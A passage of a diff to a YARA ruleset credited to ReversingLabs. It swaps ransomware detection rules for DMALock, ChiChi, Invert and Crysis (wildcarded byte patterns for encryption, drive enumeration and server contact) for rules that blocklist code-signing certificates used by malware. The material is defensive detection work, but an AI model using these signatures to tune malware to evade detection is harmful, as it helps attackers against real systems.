C4 ?? 8D 95 ?? ?? - ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 - F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ?? - ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05 - ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C - 05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ?? - ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA - } - $dmalock_v1_encrypt_files_2 = { - EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? - ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $dmalock_v1_encrypt_files_3 = { - 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A - 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55 - ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 - } - $dmalock_v1_enum_shares_and_discs_type_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? - ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ?? - ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ?? - 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ?? - 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD - E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6 - 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? - 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68 - } - $dmalock_v1_enum_shares_and_discs_type_2 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57 - 8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ?? - ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? - ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 - 0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24 - ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 - C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84 - D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90 - 8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 - C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0 - 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ?? - ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $dmalock_v1_enum_shares_and_discs_type_3 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B - 55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB - FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $dmalock_v2_enum_logical_disks = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? - ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? - B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ?? - ?? ?? 8B E5 5D C3 - } - $dmalock_v4_remote_server_communication = { - 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F - 87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 - C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 - ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B - 56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B - 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B - 56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? - 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3 - } - $dmalock_v4_encrypt_file_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? - ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56 - 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56 - 6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? - 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8 - ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? - 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $dmalock_v4_encrypt_file_2 = { - 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? - ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B - D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74 - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ?? - ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 - ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A - ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ?? - 8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 - CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3) or ($dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks) or ($dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Chichi : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE { meta: - description = "Yara rule that detects ChiChi ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "95062789-a55d-5c1c-a359-206b58f311e5" - date = "2022-02-14" - modified = "2022-02-14" + id = "4458df2d-82c2-5377-9746-101c2de52913" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.ChiChi.yara#L1-L66" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "863a30e4c708e13ea0f4c6ad42a919de463926508783d6552c0cec746730baa5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16872-L16888" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ChiChi" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $generate_key = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85 - FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D - 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74 - ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6 - 74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ?? - 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 - } - $encrypt_files = { - 55 8B EC 51 53 56 57 8B D9 68 ?? ?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? - ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57 - 6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B - 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? - ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ?? - ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 - } - $find_files = { - 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? - ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF - D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ?? - 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? - ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83 - 7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($generate_key) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aeroscan TOV" and pe.signatures[i].serial=="25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Invert : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE { meta: - description = "Yara rule that detects Invert ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7ef77946-a902-5dc6-9b3c-b7b6a687eb96" - date = "2021-11-11" - modified = "2021-11-11" + id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Invert.yara#L1-L66" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1608b8bbfc03b18a79752e60f211da7d7703862bc06b2ddf094074ae5efd0d14" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16890-L16906" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Invert" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D - ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25 - 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 - ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? - FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D - ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ?? - ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE - ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 2A - } - $find_files = { - 00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 - 72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ?? - ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE - ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 - 0D 2B ?? 09 2A - } - $get_file_list = { - 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C - ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ?? - ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B - 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ?? - ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F - ?? ?? ?? ?? 00 00 2A - } - condition: - uint16(0)==0x5A4D and ($get_file_list) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XECURE LAB CO., LTD." and pe.signatures[i].serial=="21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Crysis : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE { meta: - description = "Yara rule that detects Crysis ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bba2bbf5-ff77-5ec4-ae7f-afae1b564fb7" - date = "2020-07-15" - modified = "2020-07-15" + id = "8d1a98aa-a895-5e79-905c-760166352d4f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Crysis.yara#L1-L108" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c9250206f94ac65c1fc24e83cf8cdd76d10066086ef1f34ec14791d237c0263" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16908-L16924" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - 